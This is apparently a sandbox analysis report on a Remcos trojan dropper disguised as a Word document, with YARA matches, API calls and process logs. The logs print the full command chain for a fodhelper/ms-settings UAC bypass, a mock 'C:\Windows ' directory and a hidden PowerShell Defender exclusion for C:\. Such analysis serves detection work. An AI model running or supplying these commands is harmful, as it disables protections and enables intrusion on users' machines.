              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@53/21@51/1
              Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5632B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,8_2_00007FF64B5632B0
              Source: C:\Users\Public\ger.exe | Code function: 24_2_00007FF7E0A03F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,24_2_00007FF7E0A03F5C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04597952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,31_2_04597952
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02987F62 GetDiskFreeSpaceA,0_2_02987F62
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0299A174 CreateToolhelp32Snapshot,0_2_0299A174
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_02996D58 CoCreateInstance,0_2_02996D58
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Code function: 3_2_004026B8 LoadResource,SizeofResource,FreeResource,3_2_004026B8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0459AC78
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | File created: C:\Users\Public\Libraries\PNO
              Source: C:\Windows\SysWOW64\colorcpl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
              Source: C:\Users\Public\xkn.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File created: C:\Users\user\AppData\Local\Temp\D2F6.tmp
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | ReversingLabs: Detection: 44%
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Virustotal: Detection: 50%
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | File read: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: unknown | Process created: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe"
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: unknown | Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Users\Public\Libraries\drbdmeyP.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
              Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: aclui.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ntdsapi.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: xmllite.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: url.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ieframe.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: netapi32.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: wkscli.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: wldp.dll
